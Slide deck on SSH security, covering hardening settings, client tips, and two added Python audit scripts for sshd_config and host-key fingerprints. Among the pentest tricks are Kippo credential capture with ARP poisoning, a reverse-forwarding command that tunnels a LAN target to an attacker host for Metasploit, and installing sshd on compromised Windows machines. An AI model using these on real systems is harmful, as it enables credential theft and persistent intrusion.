2. Who am I?
• Just another computer technician
• Obtaining my macro degree in network administration from GRCC
• Planning on getting a Bachelor's degree in Digital Forensics at FSU
• Been tinkering with computers since I was in middle school
• Became obsessed with Information Security in 2005
• Owner/Hoster of zitstif.no-ip.org
• Administrator on HITB forums
3. Read this book if you want to learn more about SSH!
SSH, The Secure Shell: The Definitive Guide, 2nd Edition
By Daniel J. Barrett, Richard E. Silverman, Robert G. Byrnes
Publisher: O'Reilly Media
Released: May 2005
Pages: 668
5. Why do a presentation on SSH tricks?
• SSH is one of my favorite protocols
• There have been plenty of articles and blog posts on the subject – I thought it was time to aggregate these and add some of my own tips/tricks
6. What is SSH?
• Is it a shell? … No
• Is it a solution to all of your security problems? … No
“Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.” - en.wikipedia.org/wiki/SSh
7. SSH History
• SSH v1.X - Invented by Tatu Ylönen in 1995
• Created due to a password sniffing attack that took place at Helsinki University of Technology
• Created as a secure replacement for the telnet, rlogin and rsh protocols
8. SSH and You!
• If you work in the information technology realm, there’s a good chance you have used SSH before.
• The SSH client is natively available on practically all non-Windows operating systems
• Can be more quick and dirty than Remote Desktop
• Easier to use on a phone than Remote Desktop (You may want to check out ‘mosh’ http://mosh.mit.edu/ )
9. What can I use SSH for?
• For logging in to a shell on a remote host
• For executing a single command on a remote host (replacing rsh)
• Secure file transfer
• For forwarding or tunneling
• Forwarding X from remote hosts
• The list goes on...
https://en.wikipedia.org/wiki/Secure_Shell#Usage
10. SSH and Cyber Espionage
• Duqu Worm – (Nov 2011) Contained instructions to exploit a zero day vulnerability in OpenSSH 4.3 on CentOS systems
– After compromising the system the worm then updated OpenSSH to version 5.8
11. Speaking of SCADA/SSH...
“Another day, another SCADA threat: ICS-CERT is now warning utilities and other critical infrastructure providers about potential brute-force attacks against control systems with SSH command-line access.”
- Kelly Jackson Higgins (darkreading.com), Feb 06, 2012
13. Insecurity Issues With Default Client Settings
Make sure your clients (and servers) are strictly using version 2, or they may be vulnerable to version downgrade attacks!
You can also edit your ssh_config and set the directive:
Protocol 2
14. Downgrade attacks on SSH Clients
Downgrade attacks can be performed with ettercap-ng and ettercap-filters!
Image From http://openmaniak.com/
15. Connecting for the first time to an SSH Server: Do you know it’s safe?
If you’re very paranoid, you’ll want to verify the RSA fingerprint and randomart image against the fingerprint you’re given when connecting.
To do so, on the server side (this usually requires physical access to the machine) you would run:
sudo ssh-keygen -lvf /etc/ssh/ssh_host_rsa_key.pub
Then on your client side, edit your ssh_config file and set this option:
VisualHostKey yes
http://www.itworld.com/it-managementstrateg
16. Connecting for the first time to an SSH Server: Do you know it’s safe?
One issue with this: “Obviously you need a secure method of getting verified copies of the fingerprint and randomart images for the computers you want to log into.” - Carla Schroder
http://www.itworld.com/it-managementstrategy/261500/16
17. One other thing.. Oh yeah, Kippo can be ugly..
An attacker can capture your SSHv2 credentials using Kippo:
• To do so an attacker needs to be in your local area network or spoofing the IP address or domain name of the SSH server host that the victim is trying to connect to.
• Set up Kippo to listen on the appropriate port
• If needed, perform an ARP poisoning attack on the victim.
• Once the victim tries to connect they would most likely get a mismatching fingerprint. However, with PuTTY, an ignorant or hasty victim could simply click “YES”.
http://pauldotcom.com/wiki/index.php/Episod
18. OK I’m connected…am I still safe?
Not necessarily
- Some versions of the openssh-server daemon will handle password authentication in clear text in memory!
Proof of concept: http://zitstif.no-ip.org/capturessh2.txt
#Tested on SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
#Tested on SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
#Tested on OpenSSH 5.2 (protocol 2.0) Fedora 11
Need to find the source on this one!
19. OK I’m connected…am I still safe?
Watch out on your client side: http://blog.diogomonica.com/post/3087360614
Poor man’s SSH keylogger!
20. Locking Down The Server Side: sshd_config is your friend!
• This may be debatable, but change your ssh server’s listening port to something other than port 22.
• Again.. Make sure your ssh server is strictly using Protocol Version 2
• Do not permit root login!
• Permit/Deny only specific users or groups! (AllowUsers/AllowGroups directives OR DenyUsers/DenyGroups)
https://www.linux.com/learn/tutorials/305769-a
21. Oh yeah..a quick note on changing the default port for ssh
http://danielmiessler.com/blog/security-and-ob
23. Locking Down The Server Side: sshd_config is your friend!
• Disable PasswordAuthentication and authenticate only using keys
• Configure an idle logout time period (ClientAliveInterval XXX)
• Limit what interfaces/addresses SSHD binds to
• Limit the number of authentication tries (MaxAuthTries)
https://www.linux.com/learn/tutorials/305769
http://www.cyberciti.biz/tips/linux-unix-bsd-op
24. Locking Down The Server Side: sshd_config is your friend!
• Change the login grace time (LoginGraceTime)
• Oh yeah… disable empty passwords (Duh..) (PermitEmptyPasswords no)
https://www.linux.com/learn/tutorials/305769
http://www.cyberciti.biz/tips/linux-unix-bsd-op
http://www.uptimemore.com/password-retry-
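An added audit script in Python (not from the slides or the linked articles) that checks an sshd_config against the directives from slides 20 to 24. It parses the file the way sshd does, so the first value of a keyword wins and a later duplicate is silently ignored; the thresholds for MaxAuthTries and LoginGraceTime and the sample config are this example's own assumptions.

```python
import re

# Constructed sample (not from a real host); the 2nd PermitRootLogin is ignored, first wins.
SAMPLE = "Protocol 2,1\nPermitRootLogin yes\nMaxAuthTries 6\nPermitRootLogin no\n"
WANT = {"protocol": "2", "permitrootlogin": "no",          # values from slides 20-24
        "passwordauthentication": "no", "permitemptypasswords": "no"}

def parse_sshd_config(text):
    """Map lowercase keyword -> first value, as sshd does ('Key value' or 'Key=value').
    Stops at the first Match block, whose settings apply only conditionally."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(\S+?)(?:\s*=\s*|\s+)(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        conf.setdefault(key, value)
    return conf

def _seconds(value):  # sshd time values: '30', '2m', '1h' -> seconds
    unit = {"s": 1, "m": 60, "h": 3600}.get(value[-1].lower(), 1)
    return int(value.rstrip("smhSMH")) * unit

def audit_sshd_config(text, max_tries=3, max_grace=60):
    """Return findings as strings; an empty list means every check passed.
    The MaxAuthTries/LoginGraceTime thresholds are this example's own choice."""
    conf = parse_sshd_config(text)
    findings = []
    for key, want in WANT.items():
        got = conf.get(key)
        if got is None:
            findings.append(f"{key}: not set, the default may be weaker than '{want}'")
        elif got.lower() != want:
            findings.append(f"{key}: is '{got}', want '{want}'")
    tries = conf.get("maxauthtries", "6")                    # sshd default is 6
    if int(tries) > max_tries:
        findings.append(f"maxauthtries: {tries}, want <= {max_tries}")
    if _seconds(conf.get("logingracetime", "120")) > max_grace:   # sshd default 120s
        findings.append(f"logingracetime: over {max_grace}s")
    if _seconds(conf.get("clientaliveinterval", "0")) == 0:  # 0 = client never probed
        findings.append("clientaliveinterval: 0, dead sessions are never dropped")
    if not (conf.get("allowusers") or conf.get("allowgroups")):
        findings.append("allowusers/allowgroups: not set, any account may try to log in")
    return findings
```

ClientAliveInterval only detects clients that stop answering; it does not log out an idle but still-connected shell, so pair it with a shell-level timeout if that is what you want.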
25. Locking Down The Server Side: Programs to help you lock down your server
• If applicable use iptables (or pf) to permit/deny specific IP addresses/ranges
• List of programs to help ward off dictionary attacks/brute force attacks on http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-p (#16)
• Set up port-knocking! http://www.cyberciti.biz/tips/linux-unix-bsd-op
26. Quick tips for speeding up SSHD login: sshd_config is your friend!
• Disable server side DNS lookups if you don’t need them. (UseDNS No)
• If you’re not using PAM with SSH then disable PAM (UsePAM No)
http://www.cyberciti.biz/tips/linux-unix-bsd-op
27. Client side configuration tips: ssh_config is your friend!
Are you sick of constantly typing in your password (if you’re using passwords) when making additional connections to an ssh server you’ve already authenticated to?
Solution: Add this to your ssh_config file
Host *
ControlPath ~/.ssh/master-%r@%h:%p
ControlMaster auto
http://www.evilsoft.org/2009/10/23/stupid-
28. Client side configuration tips: ssh_config is your friend!
Save yourself some keystrokes! Instead of:
ssh -C -D 1234 user@example.com -p 5432
edit your ssh_config file to something like this:
Host example example.com
HostName example.com
User user
Port 5432
DynamicForward 1234
Compression Yes
Now you only need to type:
ssh example
http://codeutopia.net/blog/2011/07/08/why-di
29. Client side configuration tips: ssh_config is your friend!
Are there any options to check for DNS spoofing? YES!
CheckHostIP Yes
This will force ssh to do an additional check in the known_hosts file for the IP address of the server.
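An added check in Python, not from the slides or the linked articles, serving slides 15/16 and slide 29: it reproduces the fingerprint that ssh-keygen -l derives from a host public key (MD5 and SHA256 forms), so the server-side value can be compared out of band with what the client has recorded in known_hosts, and, like CheckHostIP yes, it insists that the entry for the server's IP address agrees with the entry for its name. The key bytes, hostname and IP address are constructed samples.

```python
import base64
import hashlib
import struct

def ed25519_pubkey_line(raw32, comment="host"):
    """Build an OpenSSH 'ssh-ed25519 <base64 blob> comment' line from 32 key bytes."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + raw32
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " " + comment

# Constructed sample host key (32 arbitrary bytes), not a real server's key.
SERVER_PUBKEY_LINE = ed25519_pubkey_line(bytes(range(32)), "root@example.com")
# Constructed client known_hosts: the same key recorded under the name and the IP.
KNOWN_HOSTS = ["example.com " + SERVER_PUBKEY_LINE,
               "192.0.2.10 " + SERVER_PUBKEY_LINE]

def key_blob(line):
    """Return (keytype, decoded blob) from a pubkey or known_hosts line, else None."""
    fields = line.split()
    for i, f in enumerate(fields[:-1]):
        if f.startswith(("ssh-", "ecdsa-")):
            return f, base64.b64decode(fields[i + 1])
    return None

def fingerprints(blob):
    """MD5 colon-hex (what ssh-keygen -l printed in 2012, now behind -E md5)
    and SHA256 base64 without padding (the current ssh-keygen -l default)."""
    md5 = hashlib.md5(blob).hexdigest()
    sha = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {"MD5": "MD5:" + ":".join(md5[i:i + 2] for i in range(0, 32, 2)),
            "SHA256": "SHA256:" + sha}

def server_fingerprint(pubkey_line, algo="SHA256"):
    """The value read off the server from its /etc/ssh/ssh_host_*_key.pub file."""
    return fingerprints(key_blob(pubkey_line)[1])[algo]

def recorded_fingerprints(known_hosts, host, algo="SHA256"):
    """Fingerprints stored for `host` (name or IP) in plain, unhashed known_hosts lines."""
    found = set()
    for line in known_hosts:
        parsed = key_blob(line)
        if parsed and host in line.split()[0].split(","):
            found.add(fingerprints(parsed[1])[algo])
    return found

def host_verified(known_hosts, name, ip, expected_fp):
    """True only if both the hostname entry and the IP entry carry the expected key;
    checking the IP as well is the extra step CheckHostIP yes asks ssh to perform."""
    return all(expected_fp in recorded_fingerprints(known_hosts, h) for h in (name, ip))
```

With HashKnownHosts enabled the host field is hashed and the name lookup above will not match; use ssh-keygen -F host -f ~/.ssh/known_hosts in that case.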
30. For more information on configuring sshd_config
and ssh_config, please see:
man sshd_config && man ssh_config
31. Now for those beautiful client-sided one liners… (top 10 one liners from commandlinefu.com)
39. Client-sided one liners: Fun with the ‘-t’ option
For any program that needs a pseudo-terminal to work and that you want to run quickly, use -t.
Examples:
ssh -t user@example.com "python"
ssh -t user@example.com "irb"
ssh -t user@example.com "ssh anotheruser@anotherhost.com"
ssh -t user@example.com "msfconsole"
ssh -t user@example.com "screen"
ssh -t user@example.com "vi"
40. Client-sided one liners: Fun with reverse connections
Don’t have metasploit or any fancy info-sec security tools on your device that is connected to a LAN, but this device still has an SSH client on it? NO PROBLEM!
Target host: 192.168.1.102
Target port: 445
Payload port: 4444
ssh -t -R 192.168.1.102:445:127.0.0.1:4445 -R 192.168.1.102:4444:127.0.0.1:4444 attacker@penbox.org "msfconsole"
Then through metasploit on your remote host you would point your attacks towards your loopback interface
41. Client-sided one liners (Poor man’s VPN/proxy)
This will bind a SOCKS server to port 9050 on the interface 192.168.1.100
42. Client-sided one liners (Poor man’s VPN/proxy)
OK big deal.. I know that.. What’s special about it?
43. Client-sided one liners (Poor man’s VPN/proxy)
What this means:
• You can now tunnel traffic securely between you, the client, and example.com
• If example.com’s subnet is 10.1.10.255, you can now access resources in that subnet via your tunnel, hence why this is a poor man’s VPN.
• You can use programs like proxychains in tandem with SOCKS
• NOTE: example.com’s hosts file (/etc/hosts) does affect the DNS name resolution of the SOCKS client
44. Client-sided one liners (Poor man’s VPN/proxy)
Programs that play nicely with proxychains:
rdesktop
netcat
socat
nmap
hping
telnet
openvas
nessus
hydra
wget
ssh
metasploit (though not needed) (set Proxies socks5:localhost:1234)
ncrack
...(The list goes on)
Almost any application that works on *nix and relies on TCP/IP
45. Ways of setting up sshd the quick and dirty way…
Scenario 1:
Are you doing a pentest and you’re able to find a router that is compatible with openwrt or dd-wrt? Upload it! Most versions of openwrt and dd-wrt support SSHD
Scenario 2:
You’ve popped a shell on a Windows box and you’d like to set up an SSHD server:
Copssh_3.1.4_Installer.exe /S
Copssadm --command activeuser --user USERNAME --shell /bin/bash
46. Ways of setting up sshd the quick and dirty way…
Meterpreter from the metasploit project now has a meterpreter script that can deploy an openssh server on Windows victims. (I must admit, the few times I’ve tried it, it has never worked for me!)